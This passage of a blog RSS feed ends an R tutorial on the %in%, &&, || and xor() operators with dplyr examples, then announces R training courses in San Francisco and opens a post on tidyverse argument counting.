&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Your colleague sends you a list of 50 countries (I’m going to randomly sample the names from the data) and says that they want the average life expectancy for each continent group within these 50 countries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;colleague_countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_n&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;(name_long)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(colleague_countries)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Yemen&amp;#34; &amp;#34;New Zealand&amp;#34; &amp;#34;Kyrgyzstan&amp;#34; &amp;#34;New Caledonia&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;Morocco&amp;#34; &amp;#34;Ecuador&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We could then ask R to return every row where the column &lt;code&gt;name_long&lt;/code&gt; matches any value in &lt;code&gt;colleague_countries&lt;/code&gt; using the &lt;code&gt;%in%&lt;/code&gt; operator&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(name_long &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; colleague_countries) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(continent) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(av_life_exp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(lifeExp, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## continent av_life_exp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 Africa 63.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 Asia 72.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 Europe 79.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 North America 74.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 Oceania 80.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 South America 74.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="did-you-know"&gt;Did you know?&lt;/h4&gt;
&lt;p&gt;You can make your own &lt;code&gt;%%&lt;/code&gt; operators! For instance&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;`%add%`&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(a, b) a &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; b
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%add%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="the--and--operators"&gt;The &amp;amp;&amp;amp; and || operators&lt;/h3&gt;
&lt;p&gt;If you look on the help page for the logical operators &lt;code&gt;&amp;amp;&lt;/code&gt; and &lt;code&gt;|&lt;/code&gt;, you’ll find &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt;. What do they do, and how do they actually differ from their single counterparts? Let’s look at an example. Take a vector &lt;code&gt;x&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To test for the values in x that are greater than 3 and less than 7 we would write&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE TRUE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then to return these values we would subset using square brackets&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 4 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What happens if we repeat these steps with &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## numeric(0)&lt;/span&gt;
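&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What is happening here is that the double &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; is not vectorised: it only looks at the first element of each vector (here &lt;code&gt;2 &amp;gt; 3&lt;/code&gt;, which is &lt;code&gt;FALSE&lt;/code&gt;) and returns a single value. Note that from R 4.3.0 onwards, passing a vector of length greater than one to &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; or &lt;code&gt;||&lt;/code&gt; is an error rather than a silent truncation. The double operators also evaluate from left to right and stop as soon as the result is determined, which has another nice consequence. For example, take the object &lt;code&gt;a&lt;/code&gt;&lt;/p&gt;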
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the following test&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;All three tests are evaluated, even though we know after the first test, &lt;code&gt;a == 4&lt;/code&gt;, that the overall result is &lt;code&gt;FALSE&lt;/code&gt;. Whereas when using the double &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we only evaluate the first test as that is all we need to determine the result. This is more efficient as it won’t evaluate any test it doesn’t need to. To demonstrate this, we’ll use two toy functions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hi I am f&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hi I am g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am g&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When using the single &lt;code&gt;&amp;amp;&lt;/code&gt;, R has to evaluate both functions even though the output of the left-hand side is &lt;code&gt;FALSE&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But using &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;, R only evaluates the first function, because that is already enough to determine the result! It’s the same rule for &lt;code&gt;||&lt;/code&gt;…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am g&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am g&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="the-xor-function"&gt;The xor() function&lt;/h3&gt;
&lt;p&gt;This last one isn’t so much an operator as a function. The &lt;code&gt;xor()&lt;/code&gt; function is an exclusive version of the &lt;code&gt;|&lt;/code&gt;. Take two vectors, &lt;code&gt;x&lt;/code&gt; and &lt;code&gt;y&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get all the elements where either &lt;code&gt;x&lt;/code&gt; is 1 or y is 2 we would write&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, this will also return the elements where both &lt;code&gt;x&lt;/code&gt; is 1 and &lt;code&gt;y&lt;/code&gt; is 2. If we want the elements where exactly one statement is &lt;code&gt;TRUE&lt;/code&gt;, we would use &lt;code&gt;xor()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;xor&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; , y &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That’s all for this time. Thanks for reading!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-overview-operators/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training courses in San Francisco</title><link>https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/</link><pubDate>Sun, 08 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jumping Rivers are coming to San Francisco in January 2020! We&amp;rsquo;ll be running a number of R training courses with &lt;a href="https://www.paradigmdata.io/" rel="external"&gt;Paradigm Data&lt;/a&gt;. You can find the booking links and more details over at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;courses page&lt;/a&gt;. Don&amp;rsquo;t be afraid to get in contact if you have any questions!&lt;/p&gt;
&lt;h3 id="22nd-january---intro-to-r"&gt;22nd January - Intro to R&lt;/h3&gt;
&lt;p&gt;This is a one-day intensive course on R and assumes no prior knowledge. By the end of the course, participants will be able to import, summarise and plot their data. At each step, we avoid using &amp;ldquo;magic code&amp;rdquo;, and stress the importance of understanding what R is doing.&lt;/p&gt;
&lt;h3 id="23rd-january---getting-to-grips-with-the-tidyverse"&gt;23rd January - Getting to Grips with the Tidyverse&lt;/h3&gt;
&lt;p&gt;The tidyverse is essential for any data scientist who deals with data on a day-to-day basis. By focusing on small key tasks, the tidyverse suite of packages removes the pain of data manipulation. This training course covers key aspects of the tidyverse, including {dplyr}, {lubridate}, {tidyr} and tibbles.&lt;/p&gt;
&lt;h3 id="24th-january---advanced-graphics-with-r"&gt;24th January - Advanced Graphics with R&lt;/h3&gt;
&lt;p&gt;The {ggplot2} package can create advanced and informative graphics. This training course stresses understanding - not just one off R scripts. By the end of the session, participants will be familiar with themes, scales and facets, as well as the wider {ggplot2} world of packages.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Counting Arguments in the Tidyverse</title><link>https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/</link><pubDate>Thu, 05 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
